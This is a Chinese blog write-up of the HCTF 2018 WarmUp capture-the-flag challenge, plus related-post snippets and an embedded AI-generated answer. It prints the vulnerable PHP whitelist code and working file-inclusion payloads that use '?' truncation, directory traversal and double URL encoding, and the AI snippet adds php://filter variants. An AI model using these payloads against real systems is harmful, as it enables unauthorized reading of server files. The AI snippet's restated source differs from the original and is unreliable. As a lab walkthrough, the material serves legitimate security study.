[HCTF 2018]WarmUp

最新推荐文章于 2024-05-13 22:55:07 发布
最新推荐文章于 2024-05-13 22:55:07 发布
阅读量115 收藏 1
点赞数
分类专栏: web ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_51687381/article/details/116049854
版权
本文探讨了一段PHP代码,涉及文件包含漏洞的利用和代码审计。通过分析,成功构造payload绕过安全检查,揭示了利用文件包含漏洞寻找目标文件的方法,涉及到URL编码和目录遍历技术。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

主要考察的是 文件包含漏洞和代码的审计以及一些文件操作

进入在线场景按F12

得到提示进入source.php文件得到源码

 <?php
    highlight_file(__FILE__);
    class emmm
    {
        public static function checkFile(&$page)
        {
            $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
            if (! isset($page) || !is_string($page)) {
                echo "you can't see it";
                return false;
            }

            if (in_array($page, $whitelist)) {
                return true;
            }

            $_page = mb_substr(
                $page,
                0,
                mb_strpos($page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }

            $_page = urldecode($page);
            $_page = mb_substr(
                $_page,
                0,
                mb_strpos($_page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }
            echo "you can't see it";
            return false;
        }
    }

    if (! empty($_REQUEST['file'])
        && is_string($_REQUEST['file'])
        && emmm::checkFile($_REQUEST['file'])
    ) {
        include $_REQUEST['file'];
        exit;
    } else {
        echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
    }  
?> <?php
    highlight_file(__FILE__);
    class emmm
    {
        public static function checkFile(&$page)
        {
            $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
            if (! isset($page) || !is_string($page)) {
                echo "you can't see it";
                return false;
            }

            if (in_array($page, $whitelist)) {
                return true;
            }

            $_page = mb_substr(
                $page,
                0,
                mb_strpos($page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }

            $_page = urldecode($page);
            $_page = mb_substr(
                $_page,
                0,
                mb_strpos($_page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }
            echo "you can't see it";
            return false;
        }
    }

    if (! empty($_REQUEST['file'])
        && is_string($_REQUEST['file'])
        && emmm::checkFile($_REQUEST['file'])
    ) {
        include $_REQUEST['file'];
        exit;
    } else {
        echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
    }  
?>

简略的分析之后,

我们首先尝试第一个二个if通过

用file=hint.php提交试试看

得到flag的线索在如上名称的文件中

选择尝试第三个if

我们分析可以得知第二个if截断了我们提交的file名从开始到第一个?的子字符串

所以我们可以构造一个文件名称

file =  hint.php?************

而并不确定我们的目标文件所在的文件目录

所以我们使用文件包含漏洞

hint.php?/../../../../**********(第一个/的作用是让include 的函数 认为我们的hint.php?是一个文件夹,我们再使用../返回上一层目录就可以实现了。接下来我们要做的就是重复加上../来搜索目标文件

最后我们的pay load为 ?file=source.php?/../../../../../ffffllllaaaagggg

选择第四个if

和第一个的唯一区别在于多一了一个url解码。

我们知道我们的url在提交时会被进行一次编码 让?#等符号进行编码,而我们想要在此处出现?而不在第三个问号处出现?就得进行两次的编码

?两次编码后得到%253f

所以我们的第二个pay load 为?file=source.php%253f../../../../../ffffllllaaaagggg

 

 

BUUOJ Web [HCTF 2018]WarmUp
weixin_50287973的博客
11-06 416
这道是第一道web题,对我这个菜鸡来说还是收获不少 打开页面源代码提示 进入这个页面 得到代码 <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
BUUCTF [HCTF 2018]WarmUp
m0_70764544的博客
03-07 289
我们拿到这个题,首先引入眼帘的是一个大大的笑脸,我们查看源代码去寻找一些有用的东西,我们在注释里面发现一个souce.php,所以我们打开,就是一长串php代码。让page不为空并且是字符串,这里的page也就是我们上面分析那段代码的file。这一段的意思就是传入一个变量file不为空并且是字符串就行,就能返回true。所以我们主要的是需要让上面的代码满足checkFile的条件返回true。根目录,而我们现在的路径为/var/www/html/hint.php。我们发现还有一个函数没用上,
HCTF 2018WarmUp
Lixunzhe0112的博客
01-17 1737
原理如下:在我们将参数传给file时,服务器端会自动进行一次url解码,然后这里还有个urldecode再进行一次解码。_REQUEST[‘file’])&& emmm::checkFile($_REQUEST[‘file’]三个条件同时为真,才会包含我们传入的file。/flag.php’)和include(‘…所以:/var/www/flag.php 和…/var/www/flag.php是一个文件,上层没有了。说明flag.php在 /var/html类似目录中,只有两层,var为最上层了。
BUUCTF[HCTF 2018]WarmUp 1
10-21
【知识点解析】 1. **源代码查看与漏洞分析**: 在CTF(Capture The Flag)竞赛中,查看源代码是获取服务器端脚本逻辑的重要手段。通过观察源代码,可以理解程序的运行机制、判断逻辑和潜在漏洞。...
[原题复现]HCTF 2018 Warmup
笑花大王
02-05 3100
HCTF 2018 Warmup 原题复现:https://gitee.com/xiaohua1998/hctf_2018_warmup 考察知识点:文件包含漏洞(phpmyadmin 4.8.1任意文件包含) 线上平台:https://buuoj.cn(北京联合大学公开的CTF平台) 榆林学院内可使用协会内部的CTF训练平台找到此题 过程 访问页面查看源码发现注释里面的内容访问它 访...
[HCTF 2018]WarmUp1
qq_48008847的博客
07-16 639
题目打开如上,常规思路先F12看一下网页源码 看到有一个被注释掉的source.php 看一下这是个什么东东 发现是一串代码,下面来审计一下这段代码 <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { //白名单列表 $whitelist = ["source"=&g...
buuctf [HCTF 2018]WarmUp 1 解题思路
2301_76899943的博客
05-13 971
flag.php,先检测flag.php能否包含,不能就包含…/flag.php,以此类推。,就在参数page的末尾加上?substr函数的意思就是截取字符串,截取从第0个字符串开始 长度为strpod函数给出的数字 的字符串。检查源代码可以看到有source.php的提示,那么直接打开source.php。这里要注意这个include函数,如果文件无法读取,会向后读取文件。只允许包含白名单的文件,有source.php和hint.php。(实力较弱,如有表述错误的,恳请大佬指点~~!
【web | CTF】BUUCTF [HCTF 2018]WarmUp
weixin_46301214的博客
03-03 596
访问一下hint.php文件就告诉我们,flag在 ffffllllaaaagggg 这个文件里。hint.php 是必填的,然后重点来了,想要访问成其他文件,只需要继续拼接?拦截大概意思就是,我们输入:ffffllllaaaagggg。ffffllllaaaagggg == 数组里两个文件名吗?然后你会发现,这TM是五层目录啊,而且本地是无法复现出来的。发现文件,打开访问一下看看,发现是代码审计。这里经验灵感是 四个字,所以是四层目录。
[HCTF 2018] WarmUp
Knsec
05-13 2397
[HCTF 2018] WarmUp 开局一张图,先看看页面源码信息 给出了一个 source.php 应该是后端的源码,这题代码审计了 <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.php","hint"
WEB_HCTF_2018_WarmUp
Pz_mstr's Blog
03-06 822
Categories web-代码审计 write up source code get source code http://eb22847d-9f8a-4ecf-b972-5ecebfcf5faf.node3.buuoj.cn/source.php <?php highlight_file(__FILE__); class emmm { publi...
HCTF2018-web-warmup
王德宝的博客
08-04 882
HCTF2018-web-warmup 这题是根据CVE-2018-12613 phpMyAdmin文件包含漏洞改编而来。 所以需要有文件包含漏洞的基础知识,php代码基础
[HCTF 2018]Warm up
qq_35599248的博客
07-18 2679
打开题目首先看到的是这样的,然后通过f12找到了source.php文件,打开是代码审计。 <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
HCTF 2018 Warmup(函数理解)
a3320315的博客
11-07 3317
0x01 题目描述 先看hint 看url有file参数,感觉可能要用伪协议啥的,试了下,没出东西 扫一下目录,发现./source.php源码文件 源码如下 <?php class emmm { public static function checkFile(&$page) { $whitelist = [...
[HCTF 2018]WarmUp 1
最新发布
04-01
<think>好的,我现在需要帮用户解决HCTF 2018 WarmUp题目的解题思路。首先,我应该先回忆一下这个题目的基本情况。根据用户提供的引用内容,这题可能涉及到Web安全方面的挑战,比如CTF题目常见的漏洞类型,比如文件包含、代码审计等。 用户提到参考站内引用中的第三部分是关于[HCTF 2018]WarmUp的解题思路,所以首先需要从这些信息中提取关键点。根据引用中的描述,解题思路可能涉及几个步骤:首先访问页面,查看源代码;然后发现提示,比如source.php;接着分析该文件的内容,寻找可能的漏洞点,比如文件包含或PHP伪协议利用。 接下来,我需要详细拆解每个可能的步骤。比如,第一步访问网站后,查看页面源代码,可能会发现注释中的提示,例如source.php文件。访问这个文件后,可能会得到PHP代码,这时候需要进行代码审计。代码中可能存在文件包含漏洞,比如使用include或require函数,并且参数未经过滤或过滤不严。 在代码审计过程中,需要关注如何绕过安全措施。例如,代码中可能检查参数是否在白名单中,或者是否以特定字符串开头。这时候可能要用到目录穿越,比如使用../../../../etc/passwd这样的路径,或者利用PHP伪协议如php://filter来读取源代码。 另外,可能还需要考虑服务器的文件结构,比如flag文件的位置,常见的如/flag,/var/www/html/flag.txt等。通过构造合适的payload,利用文件包含漏洞来读取这些文件。 还需要注意题目是否有其他陷阱,比如需要绕过strpos检查,或者利用二次编码来绕过过滤。例如,如果代码检查参数是否以某个字符串开头,可以通过编码绕过,比如使用%2566来代表f,因为服务器可能进行两次URL解码。 然后,总结解题步骤:查看源代码找到提示文件,审计代码找漏洞点,构造payload绕过过滤,读取flag文件。同时,要确保每一步都符合题目的具体设置,可能不同的题目会有不同的过滤方式,需要根据实际情况调整payload。 最后,生成相关问题,覆盖文件包含漏洞、PHP伪协议、代码审计等方面,帮助用户深入理解相关知识点。</think>### [HCTF 2018]WarmUp 解题思路 #### 1. 初始页面与源代码分析 - 访问题目地址后,页面显示一个卡通笑脸表情。 - **关键操作**:查看页面源代码,发现注释中提示 `source.php`,访问该路径获取服务器端PHP代码[^1]。 #### 2. 代码审计关键点 ```php <?php class emmm { public static function checkFile(&$page) { $whitelist = ["source" => "source.php", "hint" => "hint.php"]; if (!isset($page) || !is_string($page)) { echo "you can't see it"; return false; } if (in_array($page, $whitelist)) { return true; } $_page = mb_substr($page, 0, mb_strpos($page . '?', '?')); if (in_array($_page, $whitelist)) { return true; } $_page = urldecode($page); $_page = mb_substr($_page, 0, mb_strpos($_page . '?', '?')); if (in_array($_page, $whitelist)) { return true; } echo "you can't see it"; return false; } } if (empty($_REQUEST['file'])) { include 'hint.php'; } else { $file = $_REQUEST['file']; if (emmm::checkFile($file)) { include $file; } else { echo "you can't see it"; } } ``` - **漏洞点**:`include $file` 存在文件包含漏洞,但需通过 `checkFile()` 校验。 - **绕过逻辑**: 1. `$whitelist` 白名单仅允许 `source.php` 和 `hint.php`。 2. 利用 `mb_substr` 截取 `?` 前的路径,结合多次URL解码绕过检查。 #### 3. 构造Payload读取flag - **hint.php提示**:`flag not here, and flag in ffffllllaaaagggg`(暗示flag文件路径)。 - **Payload构造**: ```url file=source.php?/../../../../../ffffllllaaaagggg ``` - 原理:利用 `?` 截断路径检查,通过目录穿越访问根目录下的目标文件。 #### 4. 其他绕过方式 - **PHP伪协议**(若服务器允许): ```url file=php://filter/read=convert.base64-encode/resource=ffffllllaaaagggg ``` - **二次URL编码**(应对严格过滤): ```url file=source.php%253F/..%252F..%252F..%252F..%252F..%252Fffffllllaaaagggg ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值